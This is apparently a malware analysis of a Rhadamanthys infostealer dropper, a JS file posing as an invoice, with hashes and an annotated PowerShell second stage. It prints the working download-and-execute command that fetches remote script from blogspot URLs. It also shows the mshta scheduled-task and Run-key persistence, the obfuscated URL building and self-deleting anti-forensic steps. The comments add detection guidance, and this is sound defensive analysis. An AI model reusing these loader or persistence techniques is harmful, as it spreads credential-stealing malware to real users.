SHA256: 67875f2e02e72156853367247edf3b891f026dd182c9d9aa4cce2aea842605ee
MD5: d5422e4c92dd87a04e6aca64ffa73e8b
filename: invoice-1619232149.pdf (40).js
file type: javascript
malware family: Rhadamanthys
Type: Infostealer
The initial JS code spawns a PowerShell process with the following command:
"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (IrM <https://hotle25june.blogspot.com////phuda.pdf>); Start-Sleep -Seconds 9
It downloads the second-stage payload/script, phuda.pdf, from hotle25june.blogspot.com.
A common evasion flag, -ep Bypass, is also used; the connection is made over TLS 1.2, the downloaded content is executed with Invoke-Expression, and the loader then waits 9 seconds for that script to run.
phuda.pdf
# Bootstrap of the second stage: a character array is joined into a string,
# compiled into a script block and invoked. The array literal on the next line
# is cut off in this capture ("[)" is not valid PowerShell) — presumably the
# encoded script text; confirm against the original sample.
$cmd = [) -join ''
$scriptBlock = [scriptblock]::Create($cmd)
# Same "build a string, then execute it" pattern reappears at the Iex call below.
& $scriptBlock
# Force-kills any running RegSvcs / mshta / wscript / msbuild instances
# (lookup errors suppressed), echoing each name whether or not a process existed.
@("RegSvcs", "mshta", "wscript", "msbuild") | ForEach-Object {
Get-Process -Name $_ -ErrorAction SilentlyContinue | Stop-Process -Force
Write-Host "Stopped process: $_"
}
# Wipes every .js file in the user's Downloads folder — presumably including the
# dropper itself (the sample is a .js file, see the header). Detection note: a
# PowerShell child of wscript deleting Downloads\*.js right after stopping these
# LOLBin names is a compact hunt signal for this stage.
Remove-Item "$env:USERPROFILE\\Downloads\\*.js" -Force
# Decodes a string of decimal code points, separated by commas and/or whitespace,
# into text: every purely numeric token becomes [char][int]; anything else is dropped.
# Used below to turn $lundmureeeker into the second-stage script text.
# Returns the decoded string, or the literal "Error: <message>" if decoding throws.
# NOTE(review): backslashes appear doubled ("\\s", "\\d") throughout this capture;
# the live sample most likely used single backslashes — confirm against the original.
function Convert-DecimalToText {
param ([string]$DecimalString)
try {
($DecimalString -split '[,\\s]+' | Where-Object { $_ -match '^\\d+$' } | ForEach-Object { [char][int]$_ }) -join ''
} catch {
"Error: $_"
}
}
# Returns three random lowercase ASCII letters (a-z), built by picking one
# character per iteration of 0..2. Used to generate the per-run identifiers that
# are substituted into the decoded script, so names differ on every infection.
function Get-RandomCharacters {
$customCharacters = "abcdefghijklmnopqrstuvwxyz"
-join ((0..2) | ForEach-Object { $customCharacters.Substring((Get-Random -Maximum $customCharacters.Length), 1) })
}
# Returns a random integer in the inclusive range [$min, $max] (default 60..165);
# Get-Random's -Maximum is exclusive, hence the $max + 1. Used for the numeric
# suffix of the task names and for the scheduled-task repetition interval (minutes).
function Get-RandomNumber {
param ($min = 60, $max = 165)
return Get-Random -Minimum $min -Maximum ($max + 1)
}
# In the live sample this holds the decimal-encoded second stage consumed by
# Convert-DecimalToText; it has been blanked in this write-up and the decoded
# text is reproduced below instead.
$lundmureeeker = ""
Decoded content of the string above:
# scheduler
@"
$NhdwiJFw = @"
"javascript:var def=[[String.fromCharCode(83,104,101,108,108,46,65,112,112,108,105,99,97,116,105,111,110)],'SHE'+'LLEX'+'EC'+'UTE','pow'+'er'+'sh'+'ell','-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (Irm lnkulund); Start-Sleep -Seconds 9','',String.fromCharCode(111,112,101,110),0],jkl=new ActiveXObject(def[0]);jkl[def[1]](def[2],def[3],def[4],def[5],def[6]);close();"
"@
$taskniminimi = "phuditaskhai"
$randomlundsalajeet = "00:30:00"; Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'mshta' -Argument $NhdwiJFw) -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).Date -RepetitionInterval (New-TimeSpan -Minutes phuditimmer) -RepetitionDuration (New-TimeSpan -Days 3650) -RandomDelay $randomlundsalajeet) -TaskName $taskniminimi -Force
Set-ItemProperty -Path "HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" -Name "phuditaskhai" -Value "schtasks /run /tn $taskniminimi" #
explanation below
"@
# Decode the second stage from its decimal form (blank in this write-up).
$phudmassmdow = Convert-DecimalToText -DecimalString $lundmureeeker
# Next-stage URL assembled from fragments — presumably to defeat static string
# matching on the URL.
$fangooadwko = 'h' + 'tt' + 'ps' + ':/' + '/'
$chutmaransiwaka = $fangooadwko + 'hoteljunene' + '.blog' + 's' + 'p' + 'o' + 't.' + 'c' + 'om' + '/lun.pdf'
# Concatenates to https://hoteljunene.blogspot.com/lun.pdf — substituted for the 'lnkulund' placeholder below.
# Per-run random identifiers, so the task name, Run-key name and the JS variable
# names in the mshta payload differ on every infection.
$dabaomazyurao0 = Get-RandomCharacters
$dabaomazyurao1 = Get-RandomCharacters
$dabaomazyurao2 = Get-RandomCharacters
$dabaomazyurao3 = Get-RandomCharacters
# Scheduled-task / Run-key name ('phuditaskhai' placeholder).
$dabaomazyurao4 = "bookinxgm" + (Get-RandomNumber)
$dabaomazyurao5 = "Ubookignkwvo" + (Get-RandomNumber)
# Repetition interval in minutes ('phuditimmer' placeholder).
$dabaomazyurao6 = Get-RandomNumber
$dabaomazyurao7 = Get-RandomCharacters
$dabaomazyurao8 = Get-RandomCharacters
$dabaomazyurao9 = Get-RandomCharacters
# Patch the placeholders in the decoded script: download URL, task name, timer and
# JS variable names. 'def' and 'jkl' are visible in the mshta payload above;
# 'abc', 'ghi' and 'tskliuli' do not appear in the portion reproduced here.
# $dabaomazyurao7..9 are generated but not used in this statement.
$phudmassmdow = $phudmassmdow.Replace('tskliuli', $dabaomazyurao5).Replace('lnkulund', $chutmaransiwaka).Replace('abc', $dabaomazyurao1).Replace('def', $dabaomazyurao2).Replace('phuditimmer', $dabaomazyurao6).Replace('phuditaskhai', $dabaomazyurao4).Replace('ghi', $dabaomazyurao3).Replace('jkl', $dabaomazyurao0)
# Executes the patched script (Iex = Invoke-Expression). Detection note: the
# resulting artifacts are a scheduled task whose action is mshta with a
# "javascript:" argument and an HKCU ...\CurrentVersion\Run value of the form
# "schtasks /run /tn <name>" — both unusual enough to alert on.
$phudmassmdow | . Iex
# Anti-forensics: deletes the currently running script file from disk so the
# second stage is not left for later collection. Diagnostics go to stdout/stderr.
$scriptPath = $MyInvocation.MyCommand.Path
# Check if the script path exists
if (Test-Path $scriptPath) {
# Try to delete the script
try {
Remove-Item -Path $scriptPath -Force
Write-Output "Script has been deleted successfully."
} catch {
Write-Error "Failed to delete the script. Error: $_"
}
} else {
Write-Error "Script path does not exist."
}
# Give the Iex'd stage time to run before tearing down.
Start-Sleep -Seconds 22
# Force-kills every process whose main module path looks like a .bat file or a
# powershell binary — likely including this PowerShell host itself (see the
# launch command at the top), so this doubles as the script's own exit.
# Get processes with .bat or powershell in their command lines and stop them forcefully
Get-Process | Where-Object { $_.MainModule.FileName -like '*\\*.bat' -or $_.MainModule.FileName -like '*\\powershell*' } | ForEach-Object { Stop-Process -Id $_.Id -Force }